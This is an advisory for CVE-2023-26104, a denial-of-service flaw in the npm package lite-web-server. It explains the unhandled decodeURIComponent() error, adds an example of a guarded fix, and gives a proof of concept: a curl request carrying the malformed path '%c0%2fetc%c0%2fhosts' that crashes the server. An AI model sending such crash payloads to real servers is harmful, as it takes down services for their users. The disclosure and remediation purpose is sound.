Headline
CVE-2023-26104: Denial of Service in [email protected]
All versions of the package lite-web-server are vulnerable to Denial of Service (DoS) when an attacker sends an HTTP request and includes control characters that the decodeURI() function is unable to parse.
lite-web-server is an HTTP file server, and describes itself as "The npm package to create simple web server."
Observation:
- Virtually zero downloads, so no considerable impact.
- It was last published 6 months ago, so we can assume some level of maintenance exists.
Resources:
- Project’s GitHub source code: https://github.com/chasyumen/lite-web-server
- Project’s npm package: https://www.npmjs.com/package/lite-web-server
Background on exploitation
If an attacker makes an HTTP request to a server running with lite-web-server and includes control characters that the decodeURI() function is unable to parse, then it causes lite-web-server to crash.
The vulnerable code is line 274 of src/WebServer.js which doesn’t handle an exception thrown here:
var _url = decodeURIComponent(req.url).slice(1);
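The unguarded decode beside a guarded form that answers with HTTP 400, as an added example that is not code from lite-web-server or from the advisory. The function names (decodePathUnsafe, decodePath, handle, classify) and the sample URLs are assumptions constructed for illustration.

```javascript
// Added example; all names here are hypothetical, not lite-web-server's API.

// Pattern described in the advisory: decodeURIComponent() throws URIError on
// malformed percent-encoding, and nothing catches it. Inside a request
// callback, an uncaught exception terminates the Node.js process.
function decodePathUnsafe(rawUrl) {
  return decodeURIComponent(rawUrl).slice(1);
}

// Guarded form: a decode failure is the client's error, not a server fault.
function decodePath(rawUrl) {
  try {
    return { ok: true, path: decodeURIComponent(rawUrl).slice(1) };
  } catch (err) {
    if (err instanceof URIError) return { ok: false, status: 400 };
    throw err; // anything else is unexpected; do not hide it
  }
}

// Request handler in the shape http.createServer() expects: (req, res).
function handle(req, res) {
  const decoded = decodePath(req.url);
  if (!decoded.ok) {
    res.statusCode = decoded.status;
    res.end("Bad Request");
    return;
  }
  res.statusCode = 200;
  res.end("would serve: " + decoded.path);
}

// Constructed sample request targets: two well-formed, two malformed.
// "%c0" is a UTF-8 lead byte with no valid continuation byte after it;
// a trailing "%" has no hex digits at all.
const samples = ["/index.html", "/a%20b.txt", "/%c0%2fx", "/100%"];

// Status code each sample would receive from the guarded handler.
function classify(urls) {
  return urls.map((u) => (decodePath(u).ok ? 200 : 400));
}
```
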
Proof of Concept exploit
- Install the package: npm install --save [email protected]
- Create a server.js to serve requests (see below)
- Ensure you have a ./public directory in the current project and have a file in there
- Send an HTTP request which uses Unicode characters outside of the ASCII scope of URLs: curl http://10.100.102.7:3000/…%c0%2fetc%c0%2fhosts
- Observe the server crashes
server.js
var { WebServer } = require("lite-web-server");
var server = new WebServer({ dir: "./public/" });
server.start();
Author
Liran Tal